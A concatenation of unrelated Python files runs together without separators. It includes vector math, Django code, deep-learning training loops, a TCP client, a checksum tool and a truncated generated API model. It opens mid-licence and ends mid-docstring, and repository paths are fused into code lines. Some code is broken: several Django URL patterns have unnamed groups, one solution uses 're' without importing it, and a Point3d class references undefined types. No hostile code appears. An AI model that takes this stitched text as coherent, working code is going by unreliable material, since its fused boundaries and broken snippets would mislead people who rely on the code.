IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFT """ from maya.api import OpenMaya as om class Vector(object): """generic vector operation done with maya api """ def __init__(self, *args): if len(args)==0: self.array = om.MVector([0,0,0]) if len(args)==1: self.array = om.MVector(*args) else: self.array = om.MVector(args) def magnitude(self): """return distance between the initial point and the end point Returns: float: length of the vector """ return self.array.length() def normalize(self): """scale each value proportionaly to get a vector with the same direction but with a magnitude of 1 Returns: Vector: vector with magnitude 1 """ return Vector(self.array.normal()) def __mul__(self, other): """override the multiplication operador (*) Args: other (Vector/scalar): multiply current vetor by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array * other) return Vector(self.array * other.array) def __div__(self, other): """override the division operador (/) Args: other (Vector/scalar): divide current vetor by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array / other) return Vector(self.array / other.array) def __truediv__(self, other): """override the division operador (/) Args: other (Vector/scalar): divide current vetor by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array/other) def __add__(self, other): """override the addition operador (+) Args: other (Vector/scalar): sum current vector by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array + other) return Vector(self.array + other.array) def __sub__(self, other): """override the substract operador (-) Args: other (Vector/scalar): substract current vector by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array - other) return Vector(self.array - other.array) def __iter__(self): """override the iteration operation(for a in Vector), iterating by each vector element Returns: iter """ return iter(self.array) def __len__(self): """override the len operation(len(Vector)), returning how many elements has Returns: int """ return len(self.array) def __getitem__(self, key): """override the get index operation (Vector[i]), returning the element at index Args: key (int): element at index Returns: float: value at index """ return self.array[key] def __setitem__(self, key, value): """override the setindex operation (Vector[i]), setting the element at index Args: key (int): element at index """ self.array[key] = float(value) def __repr__(self): """override the string representation Returns: str: elements as string """ return str(self.array) def __neg__(self): """override the negation operation (-obj) Returns: Vector: negated Vector """ return Vector(self.array * -1) from ..crud_relations import CrudRelations from ..crud_serializer import CrudSerializer from .create_item_view import CrudCreateItemView from .delete_item_view import CrudDeleteItemView from .get_item_view import CrudGetItemView from .get_list_view import CrudGetListView from .update_item_view import CrudUpdateItemView class CrudView( CrudUpdateItemView, CrudGetListView, CrudGetItemView, CrudDeleteItemView, 
CrudCreateItemView, ): def __init__( self, model, serializer: CrudSerializer = None, relations: CrudRelations = CrudRelations, ): self.model = model self.relations = relations self.serializer = serializer self.limit = 10 """ Problem: 10.2 Group Anagrams: Write a method to sort an array of strings so that all the anagrams are next to each other. Hints: #117, #182, #263, #342 -- Questions: - Should the strings also be sorted alphabetically or is the method only responsible to group the strings by anagrams? - Can we assume the strings have only ASCII characters? - Should we consider uppercase letters as the same? Ex: DOG and god. -- Algorithm: A word is an anagram of another if they contain the same number of each letter. Ex: dog, god If strings are of different length, they are not anagrams of each other. -- Option 1 -- If we sort the characters in every string, we can then sort the array and the anagrams will be grouped together. Time Complexity: O(nlogn) However, we do not have to sort the array, we only have to group the anagrams. Therefore, take a look at solution2.py """ def group_anagrams(words): sorted_words = sorted(words, key=lambda x: sorted(list(x))) return sorted_words def test(words, expected_answer): answer = group_anagrams(words) if answer != expected_answer: raise Exception( f"Answer {answer} is wrong. Expected answer is {expected_answer}" ) if __name__ == "__main__": test(["dog", "hi", "god"], ["dog", "god", "hi"]) test( ["john", "doe", "abra", "braa", "nohj", "hey"], ["abra", "braa", "doe", "hey", "john", "nohj"], ) test(["dog", "hey", "dddo", "bbbog", "god"], ["bbbog", "dddo", "dog", "god", "hey"]) print("All tests passed!") 0 # -*- encoding: utf-8 -*- """ @Author : zYx.Tom @Contact : @site : https://zhuyuanxiang.github.io --------------------------- @Software : PyCharm @Project : Dive-into-Deep-Learning @File : sec0202.py @Version : v0.1 @Time : 2020-12-27 9:25 @License : (C)Copyright 2018-2020, zYx.Tom @Reference : 《动手学深度学习》 @Desc : Sec 7.3 小批量随机梯度下降 @小结: 1. 小批量随机梯度每次随机均匀采样一个小批量的训练样本来计算梯度 2. (小批量)随机梯度下降的学习率可以在迭代过程中自我衰减 3. 
小批量随机梯度在每个迭代周期的耗时介于梯度下降和随机梯度下降的耗时之间 """ import time import d2lzh as d2l import numpy as np from mxnet import autograd, gluon, init, nd from mxnet.gluon import data as gdata, loss as gloss, nn from data import get_data_ch7 from tools import beep_end, show_figures # ---------------------------------------------------------------------- def main(): features, labels = get_data_ch7() print(features.shape) print(labels.shape) # train_sgd(sgd, None, 1, features, labels, 1500, 6) # 梯度下降 # train_sgd(sgd, None, 0.005, features, labels, 1) # 随机梯度下降 # train_sgd(sgd, None, 0.05, features, labels, 10) # 小批量随机梯度下降 train_gluon_ch7('sgd', {'learning_rate': 0.05}, features, labels, 10) pass def train_gluon_ch7(trainer_name, trainer_hyperparams, features, labels, batch_size=10, num_epochs=2): net = nn.Sequential() net.add(nn.Dense(1)) net.initialize(init.Normal(sigma=0.01)) loss = gloss.L2Loss() def eval_loss(): return loss(net(features), labels).mean().asscalar() ls = [eval_loss()] data_iter = gdata.DataLoader(gdata.ArrayDataset(features, labels), batch_size, shuffle=True) trainer = gluon.Trainer(net.collect_params(), trainer_name, trainer_hyperparams) start = time.time() for _ in range(num_epochs): for batch_i, (X, y) in enumerate(data_iter): with autograd.record(): l = loss(net(X), y) pass l.backward() trainer.step(batch_size) if (batch_i + 1) * batch_size % 100 == 0: ls.append(eval_loss()) pass pass pass print("loss: %f, %f sec per epoch" % (ls[-1], time.time() - start)) d2l.set_figsize() d2l.plt.plot(np.linspace(0, num_epochs, len(ls)), ls) d2l.plt.xlabel('epoch') d2l.plt.ylabel('loss') pass def train_sgd(trainer_fn, states, lr, features, labels, batch_size, num_epochs=2): train_ch7(trainer_fn, states, {'lr': lr}, features, labels, batch_size, num_epochs) def train_ch7(trainer_fn, states, hyperparams, features, labels, batch_size=10, num_epochs=2): net, loss = d2l.linreg, d2l.squared_loss w = nd.random.normal(scale=0.01, shape=(features.shape[1], 1)) b = nd.zeros(1) w.attach_grad() b.attach_grad() def eval_loss(): return loss(net(features, w, b), labels).mean().asscalar() ls = [eval_loss()] data_iter = gdata.DataLoader(gdata.ArrayDataset(features, labels), batch_size, shuffle=True) start = time.time() for _ in range(num_epochs): for batch_i, (X, y) in enumerate(data_iter): with autograd.record(): l = loss(net(X, w, b), y).mean() # 使用平均损失 pass l.backward() trainer_fn([w, b], states, hyperparams) # 迭代模型参数 if (batch_i + 1) * batch_size % 100 == 0: ls.append(eval_loss()) # 每 100 个样本记录下当前训练误差 pass pass pass print("loss: %f, %f sec per epoch" % (ls[-1], time.time() - start)) d2l.set_figsize() d2l.plt.plot(np.linspace(0, num_epochs, len(ls)), ls) d2l.plt.xlabel("epoch") d2l.plt.ylabel("loss") pass def sgd(params, states, hyperparams): """ """ for p in params: p[:] -= hyperparams['lr'] * p.grad pass pass # ---------------------------------------------------------------------- if __name__ == '__main__': main() # 运行结束的提醒 beep_end() show_figures() """ OpenStack Cinder Services """ from openstackinabox.services.cinder.v1 import CinderV1Service __all__ = [ CinderV1Service ] from .vector3d import Vector3d from .point import PointBase class Point3d(Vector3d, PointBase): """Functionally similar to a Vector3d, but concpetually distinct, and includes several additional methods. """ def __init__(self, *args, **kwargs): Vector3d.__init__() PointBase.__init__() def __repr__(self): return 'Point3d(%s, %s, %s)' % self.coords def distanceTo(self, other): """Find the distance between this point and another. 
""" if isinstance(other, Plane3d): # get distance between point and plane pass elif isinstance(other, Line3d): # get distance between point and line pass else: return (other - self).length def get_financial_report_url(customer): return f'/api/financial-reports/{customer.uuid.hex}/' def load(): with open("input") as f: return [int(i) for i in f.read().strip().split(",")] def simulate(days): fish = load() for _ in range(days): for i in range(len(fish)): if fish[i] == 0: fish[i] = 6 fish.append(8) else: fish[i] -= 1 return len(fish) print(simulate(80)) # Generated by Django 3.0.5 on 2020-05-21 14:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('slogger', '0007_percentile'), ] operations = [ migrations.AddField( model_name='meal', name='dt_end', field=models.DateTimeField(blank=True, default=None, null=True, verbose_name='Eaten until'), ), migrations.AlterField( model_name='measurement', name='height', field=models.FloatField(blank=True, null=True, verbose_name='Height (cm)'), ), migrations.AlterField( model_name='measurement', name='weight', field=models.FloatField(blank=True, null=True, verbose_name='Weight (kg)'), ), ] #!/usr/bin/env python # # Copyright 2016 MIT Lincoln Laboratory, Massachusetts Institute of Technology # # Licensed under the Apache License, Version 2.0 (the "License"); you may not use these files except in compliance with # the License. # # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on # an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # """ Authors: Date: April 30, 2015 Installation: Python 2.7 on Windows 7 Description: This script is an example of using pyTweet to create a Twitter data set with depth first sampling for hashtag cascades. """ import datetime from pyTweet import * def main(): # Params for connecting to the PostgreSQL database postgres_params = {'dbname': 'your database name', 'user': 'role name', 'password': '', 'host': 'your host', 'port': 'your port'} # Enter proxy information host = 'proxy host' port = 'proxy port' # Enter time frame for time line tl_start_date = datetime.date(year=2016, month=1, day=1) tl_end_date = datetime.date(year=2016, month=7, day=1) # Enter the maximum number of hops hop_out_limits = {'max_hops': 5} # Enter the directory to save place saving variables that keep track of the collection in case the process is # interrupted. You should never delete these files. 
save_params = {'twitter_profiles': '/dir/to/save/place/saving/variables'} # Load seed of users print '\nLoad username seed' username_seed = ['username1', 'username2', 'username3'] # Prepare new database print "\nPrepare new database" json_to_database.prepare_graph_database(postgres_params=postgres_params) json_to_database.clear_tables(postgres_params) pyTweet.clear_place_savers(user_dir=save_params['twitter_profiles']) # Build network using the cascade sampling method depth_first_sampling.depth_first_cascade_search(user_seed=username_seed, tl_start_date=tl_start_date, tl_end_date=tl_end_date, postgres_params=postgres_params, host=host, port=port, save_dir=save_params, hop_limits=hop_out_limits) if __name__ == '__main__': main()OKaluza/naparinapari/layers/points/_constants.py from enum import Enum, auto from ...utils.misc import StringEnum class Mode(StringEnum): """ Mode: Interactive mode. The normal, default mode is PAN_ZOOM, which allows for normal interactivity with the canvas. ADD allows points to be added by clicking SELECT allows the user to select points by clicking on them """ ADD = auto() SELECT = auto() PAN_ZOOM = auto() class Symbol(Enum): """Symbol: Valid symbol/marker types for the Points layer. The string method returns the valid vispy string. """ ARROW = 'arrow' CLOBBER = 'clobber' CROSS = 'cross' DIAMOND = 'diamond' DISC = 'disc' HBAR = 'hbar' RING = 'ring' SQUARE = 'square' STAR = 'star' TAILED_ARROW = 'tailed_arrow' TRIANGLE_DOWN = 'triangle_down' TRIANGLE_UP = 'triangle_up' VBAR = 'vbar' X = 'x' def __str__(self): """String representation: The string method returns the valid vispy symbol string for the Markers visual. """ return self.value # Mapping of symbol alias names to the deduplicated name SYMBOL_ALIAS = { 'o': Symbol.DISC, '*': Symbol.STAR, '+': Symbol.CROSS, '-': Symbol.HBAR, '->': Symbol.TAILED_ARROW, '>': Symbol.ARROW, '^': Symbol.TRIANGLE_UP, 'v': Symbol.TRIANGLE_DOWN, 's': Symbol.SQUARE, '|': Symbol.VBAR, } kylef-archive/lithiumlithium/wiki/urls.py from django.conf.urls.defaults import * from django.views.generic import ListView from lithium.wiki.models import Page, Revision urlpatterns = patterns('lithium.wiki.views', url(r'^$', 'page_detail', dict(slug='Start'), 'wiki.start_page'), url(r'^recent-changes/$', ListView.as_view(queryset=Revision.objects.all().select_related())), url(r'^(?P[-\w]+)/$', 'page_detail', name='wiki.page_detail'), url(r'^(?P[-\w]+)/edit/$', 'page_edit', name='wiki.page_edit'), url(r'^(?P[-\w]+)/history/$', 'page_history', name='wiki.page_history'), url(r'^(?P[-\w]+)/discuss/$', 'page_discuss', name='wiki.page_discuss'), url(r'^(?P[-\w]+)/children/$', 'page_children', name='wiki.page_children'), url(r'^(?P[-\w]+)/(?P[\d]+)/$', 'revision_detail', name='wiki.revision_detail'), url(r'^(?P[-\w]+)/revert/(?P[\d]+)/$', 'revision_revert', name='wiki.revision_revert'), url(r'^(?P[-\w]+)/diff$', 'revision_diff', name='wiki.revision_diff'), ) import socket serverAddr = "192.168.1.4" serverPort = 10000 client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_sock.connect((serverAddr, serverPort)) while True: clientInput= input(' please input > ') client_sock.send(clientInput.encode()) response = client_sock.recv(1024) print (response) client_sock.close()class Solution(object): def validWordAbbreviation(self, word, abbr): """ :type word: str :type abbr: str :rtype: bool """ return bool(re.match(re.sub('([1-9]\d*)', r'.{\1}', abbr) + '$', word))0 import qrcode class QRCodeGenerate(): def __init__(self): print("construct") def 
generate_qr_code(self): qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=8, border=2) qr.add_data("url") qr.make(fit=True) img = qr.make_image() # img.show() # img.drawrect(10,10) # img.save('test.jpg') img.get_image() return img if __name__ == "__main__": q = QRCodeGenerate() q.generate_qr_code() #!/usr/bin/python3 # Copyright 2021 Canonical Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # For those usages not covered by the Apache License, Version 2.0 please # contact: # # To get in touch with the maintainers, please contact: # ## import unittest # import zaza.model as model class BasicDeployment(unittest.TestCase): def test_kafka(self): pass import abc import typing import torch __all__ = ['Criterion', 'ComposeCriterion'] class Criterion(torch.nn.Module, metaclass=abc.ABCMeta): @property @abc.abstractmethod def reduction(self): raise NotImplementedError() @abc.abstractmethod def forward(self, outputs, targets): raise NotImplementedError() class ComposeCriterion(Criterion): def __init__(self, criterion: typing.Dict[str, Criterion]): super().__init__() self._criterion = criterion for k, v in self._criterion.items(): self.add_module(k, v) @property def reduction(self): return {k: v.reduction for k, v in self._criterion.items()} def forward(self, outputs, targets): return {k: v.forward(outputs, targets) for k, v in self._criterion.items()} 0 class CuentaBancaria(): def __init__(self, ID, titular, fecha_apertura, numero_cuenta, saldo): self.ID = ID self.titular = titular self.fecha_apertura = fecha_apertura self.numero_cuenta = numero_cuenta self.saldo = saldo #Método set def setID(self, ID): self.ID = ID def settitular(self, titular): self.titular = titular def setfecha_apertura(self, fecha_apertura): self.fecha_apertura = fecha_apertura def setnumero_cuenta(self, numero_cuenta): self.numero_cuenta = numero_cuenta def setsaldo(self, saldo): self.saldo = saldo #Método get def getID(self): return self.ID def gettitular(self): return self.titular def getfecha_apertura(self): return self.fecha_apertura def getnumero_cuenta(self): return self.numero_cuenta def getsaldo(self): return self.saldo #Método para retirar dinero def retirar_dinero(self, dinero): if float(dinero) > self.getsaldo(): print('No hay suficiente dinero para retirar') else: dinero_final = (self.getsaldo()) - float(dinero) self.setsaldo(dinero_final) #Método para ingresar dinero def ingresar_dinero(self, dinero): dinero_final = (self.getsaldo()) + float(dinero) self.setsaldo(dinero_final) #Método para transferir dinero def transferir_dinero(self, dinero, cuenta): if float(dinero) > self.getsaldo(): print('No hay suficiente saldo para transferir') else: self.retirar_dinero(dinero) cuenta.ingresar_dinero(dinero) from abc import abstractmethod import math import numpy as np import itertools import lstm import progressbar class Evaluation(object): """An abstract evaluation method for click models.""" @abstractmethod def evaluate(self, click_model, search_sessions): """ Evaluates the quality of the 
given click model using the given list of search sessions. This method must be implemented by subclasses. :param click_model: The click model to evaluate. :param search_sessions: The list of search sessions (also known as test set). :return: The quality of the click model, given the set of test search sessions. """ pass class LogLikelihood(Evaluation): """ depricated, keras evalution is used for loglikelihood """ def __init__(self): pass def evaluate(self, prediction_probabilities, labels): loglikelihood = 0.0 eps = 1e-10 for i, probabilities_per_rank in enumerate(prediction_probabilities): label = [l[0] for l in labels[i]] probabilities_per_rank = [p[0] for p in probabilities_per_rank] ps = [] for rank, click_prob in enumerate(probabilities_per_rank): if label[rank]: p = click_prob else: p = 1 - click_prob ps.append(p) log_click_probs = [math.log(prob+eps) for prob in ps] loglikelihood += sum(log_click_probs) #TODO: CHECK OF WE DOOR 10 MOETEN DELEN!!!! loglikelihood /= len(prediction_probabilities) return loglikelihood class Perplexity(Evaluation): def __init__(self): pass def evaluate(self, prediction_probabilities, labels): # epsilon eps = 1e-10 # init perplexity per rank array perplexity_per_rank = 10*[0.] for i, pred in enumerate(prediction_probabilities): for j in range(len(perplexity_per_rank)): #print i,j, prediction_probabilities[i][j], labels[i][j] # if click if labels[i][j] == [0.]: p = 1-(prediction_probabilities[i][j]) else: p = prediction_probabilities[i][j] perplexity_per_rank[j] += math.log(p, 2) perpl = 0 #for perp in perplexity_per_rank: # perpl += 2**(-perp/float(len(prediction_probabilities))) #perplexity = perpl/10. #perplexity_at_rank = np.array(perplexity_per_rank)/float(len(prediction_probabilities)) perplexity_at_rank = [2 ** (-x / len(prediction_probabilities)) for x in perplexity_per_rank] perplexity = sum(perplexity_at_rank) / len(perplexity_per_rank) return perplexity, perplexity_at_rank class ConditionalPerplexity(Evaluation): def __init__(self): pass def evaluate(self, batch_X, batch_y, lstmnn): lst = np.array([np.array(list(reversed(l))) for l in list( itertools.product([[0.], [1.]], repeat=9))]) lst = np.concatenate([np.zeros([512,1,1]), lst], axis=1) lst = np.reshape(lst, [512,10]) TOTAL_RANKS = 10 NUM_SERPS = batch_y.shape[0] perplexity_at_rank = [0.0] * TOTAL_RANKS # bar = progressbar.ProgressBar(maxval=NUM_SERPS, # widgets=[progressbar.Bar('=', '[', ']'), ' ', # progressbar.Counter()]) for s in range(NUM_SERPS): #print s data = batch_X[s] data = np.reshape(data, (1, 10, batch_X.shape[2])) labels = batch_y[s] data_m = np.tile(data.copy(), [512,1,1]) data_m[:,:,-1] = lst probability = np.reshape(lstmnn.model.predict_proba(data_m, verbose=0).T, [10,512]) probs = [[],[]] probs[0] = 1.0 - probability probs[1] = probability ppr = [0.] 
* TOTAL_RANKS for i in xrange(TOTAL_RANKS): if i == 0: label = int(labels[i]) inter = np.zeros([2]) inter[0] = probs[0][0,i] inter[1] = probs[1][0,i] ppr[i] = inter[label] prev_inter = inter.copy() else: label = int(labels[i]) dims = [2] * (i + 1) inter = np.zeros(dims) c = 0.0 for idx in [list(reversed(l)) for l in list(itertools.product([0, 1], repeat=i+1))]: inter[tuple(idx)] = probs[idx[0]][i, int(c)] * prev_inter[tuple(idx[1:])] c += 0.5 ppr[i] = float(label) * np.sum(inter[1]) + float(1-label) * np.sum(inter[0]) prev_inter = inter.copy() for rank, click_prob in enumerate(ppr): perplexity_at_rank[rank] += math.log(click_prob, 2) perplexity_at_rank = [2 ** (-x / NUM_SERPS) for x in perplexity_at_rank] perplexity = sum(perplexity_at_rank) / len(perplexity_at_rank) return perplexity, perplexity_at_rank if __name__ == "__main__": evaluator = ConditionalPerplexity() data_dir = "../data/sparse_matrix_set1_train_0-500000.pickle/" lstmnn_init = lstm.LSTMNN() lstmnn_init.create_model() batch_itr = lstmnn_init.get_batch_pickle(data_dir) for step, (batch_X, batch_y) in enumerate(batch_itr): evaluator.evaluate(batch_X, batch_y) break """Generates checksums for every file within a directory (recursively), displaying those checksums through stdout. Created to provide an example of how to use the fileprocessor module. """ import sys import hashlib from fileprocessor import FileProcessor, searchers, filterers, extractors class ChecksumGenerator(extractors.ByteStreamExtractor): """Generates """ def __init__(self, blockSize = 65536): """Construct instance of ChecksumGenerator. Keyword arguments: blockSize -- Amount of data to read it at once when generating checksum. Should be fairly low if the machine does not have much memory. (default: 65536) """ self.blockSize = blockSize def extractFromStream(self, data): """Generate and reutrn SHA-1 checksum from stream of byte data. Arguments: data -- Byte stream containing data to generate checksum for """ hasher = hashlib.sha1() buff = data.read(self.blockSize) while len(buff) > 0: hasher.update(buff) buff = data.read(self.blockSize) return hasher.hexdigest() def main(directoriesToSearch): """Run checksum generation process. Arguments: directoriesToSearch -- List containing all of the directories containing files to generate checksums for """ # Build components to use for file processor searcher = searchers.FileSearcher(True) extractor = ChecksumGenerator() processor = FileProcessor(searcher, [], extractor) # Perofrm checksum generation and display every checksum generatedChecksums = processor.process(directoriesToSearch) for filename, checksum in generatedChecksums.items(): print("{}\n\t{}".format(filename, checksum)) if __name__ == "__main__": # Parse command line arguments if len(sys.argv) < 3: sys.exit("Usage: python {} {{-d }}".format(sys.argv[0])) directoriesToSearch = [] # store all directories requesed for i in range(1, len(sys.argv)): if sys.argv[i] == "-d" and i < (len(sys.argv) - 1): i += 1 # go to next argumnet, the actual directory directoriesToSearch.append( sys.argv[i] ) if len(directoriesToSearch) == 0: sys.exit("No directories to search specified") main(directoriesToSearch)# coding: utf-8 """ UltraCart Rest API V2 UltraCart REST API Version 2 OpenAPI spec version: 2.0.0 Contact: Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class CartItem(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. 
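# --- Aside: a standalone sketch (not part of the evaluation module above) of the
# perplexity-at-rank computation the Perplexity class implements: for each rank r,
# perplexity_r = 2 ** (-(1/N) * sum over sessions of log2 p), where p is the predicted
# probability of the observed click/skip at that rank. Function names and example values
# below are illustrative only.
import math

def perplexity_at_rank(prediction_probabilities, labels):
    """prediction_probabilities: per-session lists of click probabilities per rank.
    labels: matching per-session lists of 0/1 click labels."""
    eps = 1e-10
    num_sessions = len(prediction_probabilities)
    num_ranks = len(prediction_probabilities[0])
    log_sums = [0.0] * num_ranks
    for probs, clicks in zip(prediction_probabilities, labels):
        for r in range(num_ranks):
            # Probability assigned to what was actually observed at this rank.
            p = probs[r] if clicks[r] else 1.0 - probs[r]
            log_sums[r] += math.log(p + eps, 2)
    per_rank = [2 ** (-s / num_sessions) for s in log_sums]
    return sum(per_rank) / num_ranks, per_rank

# Example: two sessions of three ranks each; a well-calibrated model yields low perplexity.
# perplexity_at_rank([[0.9, 0.2, 0.1], [0.8, 0.3, 0.05]], [[1, 0, 0], [1, 0, 0]])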
""" """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'arbitrary_unit_cost': 'Currency', 'attributes': 'list[CartItemAttribute]', 'auto_order_schedule': 'str', 'default_image_url': 'str', 'default_thumbnail_url': 'str', 'description': 'str', 'discount': 'Currency', 'extended_description': 'str', 'item_id': 'str', 'item_oid': 'int', 'kit': 'bool', 'kit_component_options': 'list[CartKitComponentOption]', 'manufacturer_suggested_retail_price': 'Currency', 'maximum_quantity': 'float', 'minimum_quantity': 'float', 'multimedia': 'list[CartItemMultimedia]', 'options': 'list[CartItemOption]', 'phsyical': 'CartItemPhysical', 'position': 'int', 'preorder': 'bool', 'quantity': 'float', 'schedules': 'list[str]', 'total_cost': 'Currency', 'total_cost_with_discount': 'Currency', 'unit_cost': 'Currency', 'unit_cost_with_discount': 'Currency', 'upsell': 'bool', 'variations': 'list[CartItemVariationSelection]', 'view_url': 'str' } attribute_map = { 'arbitrary_unit_cost': 'arbitrary_unit_cost', 'attributes': 'attributes', 'auto_order_schedule': 'auto_order_schedule', 'default_image_url': 'default_image_url', 'default_thumbnail_url': 'default_thumbnail_url', 'description': 'description', 'discount': 'discount', 'extended_description': 'extended_description', 'item_id': 'item_id', 'item_oid': 'item_oid', 'kit': 'kit', 'kit_component_options': 'kit_component_options', 'manufacturer_suggested_retail_price': 'manufacturer_suggested_retail_price', 'maximum_quantity': 'maximum_quantity', 'minimum_quantity': 'minimum_quantity', 'multimedia': 'multimedia', 'options': 'options', 'phsyical': 'phsyical', 'position': 'position', 'preorder': 'preorder', 'quantity': 'quantity', 'schedules': 'schedules', 'total_cost': 'total_cost', 'total_cost_with_discount': 'total_cost_with_discount', 'unit_cost': 'unit_cost', 'unit_cost_with_discount': 'unit_cost_with_discount', 'upsell': 'upsell', 'variations': 'variations', 'view_url': 'view_url' } def __init__(self, arbitrary_unit_cost=None, attributes=None, auto_order_schedule=None, default_image_url=None, default_thumbnail_url=None, description=None, discount=None, extended_description=None, item_id=None, item_oid=None, kit=None, kit_component_options=None, manufacturer_suggested_retail_price=None, maximum_quantity=None, minimum_quantity=None, multimedia=None, options=None, phsyical=None, position=None, preorder=None, quantity=None, schedules=None, total_cost=None, total_cost_with_discount=None, unit_cost=None, unit_cost_with_discount=None, upsell=None, variations=None, view_url=None): """ CartItem - a model defined in Swagger """ self._arbitrary_unit_cost = None self._attributes = None self._auto_order_schedule = None self._default_image_url = None self._default_thumbnail_url = None self._description = None self._discount = None self._extended_description = None self._item_id = None self._item_oid = None self._kit = None self._kit_component_options = None self._manufacturer_suggested_retail_price = None self._maximum_quantity = None self._minimum_quantity = None self._multimedia = None self._options = None self._phsyical = None self._position = None self._preorder = None self._quantity = None self._schedules = None self._total_cost = None self._total_cost_with_discount = None self._unit_cost = None self._unit_cost_with_discount = None self._upsell = None self._variations = None self._view_url = None self.discriminator = None 
if arbitrary_unit_cost is not None: self.arbitrary_unit_cost = arbitrary_unit_cost if attributes is not None: self.attributes = attributes if auto_order_schedule is not None: self.auto_order_schedule = auto_order_schedule if default_image_url is not None: self.default_image_url = default_image_url if default_thumbnail_url is not None: self.default_thumbnail_url = default_thumbnail_url if description is not None: self.description = description if discount is not None: self.discount = discount if extended_description is not None: self.extended_description = extended_description if item_id is not None: self.item_id = item_id if item_oid is not None: self.item_oid = item_oid if kit is not None: self.kit = kit if kit_component_options is not None: self.kit_component_options = kit_component_options if manufacturer_suggested_retail_price is not None: self.manufacturer_suggested_retail_price = manufacturer_suggested_retail_price if maximum_quantity is not None: self.maximum_quantity = maximum_quantity if minimum_quantity is not None: self.minimum_quantity = minimum_quantity if multimedia is not None: self.multimedia = multimedia if options is not None: self.options = options if phsyical is not None: self.phsyical = phsyical if position is not None: self.position = position if preorder is not None: self.preorder = preorder if quantity is not None: self.quantity = quantity if schedules is not None: self.schedules = schedules if total_cost is not None: self.total_cost = total_cost if total_cost_with_discount is not None: self.total_cost_with_discount = total_cost_with_discount if unit_cost is not None: self.unit_cost = unit_cost if unit_cost_with_discount is not None: self.unit_cost_with_discount = unit_cost_with_discount if upsell is not None: self.upsell = upsell if variations is not None: self.variations = variations if view_url is not None: self.view_url = view_url @property def arbitrary_unit_cost(self): """ Gets the arbitrary_unit_cost of this CartItem. :return: The arbitrary_unit_cost of this CartItem. :rtype: Currency """ return self._arbitrary_unit_cost @arbitrary_unit_cost.setter def arbitrary_unit_cost(self, arbitrary_unit_cost): """ Sets the arbitrary_unit_cost of this CartItem. :param arbitrary_unit_cost: The arbitrary_unit_cost of this CartItem. :type: Currency """ self._arbitrary_unit_cost = arbitrary_unit_cost @property def attributes(self): """ Gets the attributes of this CartItem. Attributes :return: The attributes of this CartItem. :rtype: list[CartItemAttribute] """ return self._attributes @attributes.setter def attributes(self, attributes): """ Sets the attributes of this CartItem. Attributes :param attributes: The attributes of this CartItem. :type: list[CartItemAttribute] """ self._attributes = attributes @property def auto_order_schedule(self): """ Gets the auto_order_schedule of this CartItem. Auto order schedule the customer selected :return: The auto_order_schedule of this CartItem. :rtype: str """ return self._auto_order_schedule @auto_order_schedule.setter def auto_order_schedule(self, auto_order_schedule): """ Sets the auto_order_schedule of this CartItem. Auto order schedule the customer selected :param auto_order_schedule: The auto_order_schedule of this CartItem. :type: str """ self._auto_order_schedule = auto_order_schedule @property def default_image_url(self): """ Gets the default_image_url of this CartItem. URL to the default multimedia image :return: The default_image_url of this CartItem. 
:rtype: str """ return self._default_image_url @default_image_url.setter def default_image_url(self, default_image_url): """ Sets the default_image_url of this CartItem. URL to the default multimedia image :param default_image_url: The default_image_url of this CartItem. :type: str """ self._default_image_url = default_image_url @property def default_thumbnail_url(self): """ Gets the default_thumbnail_url of this CartItem. URL to the default multimedia thumbnail :return: The default_thumbnail_url of this CartItem. :rtype: str """ return self._default_thumbnail_url @default_thumbnail_url.setter def default_thumbnail_url(self, default_thumbnail_url): """ Sets the default_thumbnail_url of this CartItem. URL to the default multimedia thumbnail :param default_thumbnail_url: The default_thumbnail_url of this CartItem. :type: str """ self._default_thumbnail_url = default_thumbnail_url @property def description(self): """ Gets the description of this CartItem. Description of the item :return: The description of this CartItem. :rtype: str """ return self._description @description.setter def description(self, description): """ Sets the description of this CartItem. Description of the item :param description: The description of this CartItem. :type: str """ self._description = description @property def discount(self): """ Gets the discount of this CartItem. :return: The discount of this CartItem. :rtype: Currency """ return self._discount @discount.setter def discount(self, discount): """ Sets the discount of this CartItem. :param discount: The discount of this CartItem. :type: Currency """ self._discount = discount @property def extended_description(self): """ Gets the extended_description of this CartItem. Extended description of the item :return: The extended_description of this CartItem. :rtype: str """ return self._extended_description @extended_description.setter def extended_description(self, extended_description): """ Sets the extended_description of this CartItem. Extended description of the item :param extended_description: The extended_description of this CartItem. :type: str """ self._extended_description = extended_description @property def item_id(self): """ Gets the item_id of this CartItem. Item ID :return: The item_id of this CartItem. :rtype: str """ return self._item_id @item_id.setter def item_id(self, item_id): """ Sets the item_id of this CartItem. Item ID :param item_id: The item_id of this CartItem. :type: str """ self._item_id = item_id @property def item_oid(self): """ Gets the item_oid of this CartItem. Item object identifier :return: The item_oid of this CartItem. :rtype: int """ return self._item_oid @item_oid.setter def item_oid(self, item_oid): """ Sets the item_oid of this CartItem. Item object identifier :param item_oid: The item_oid of 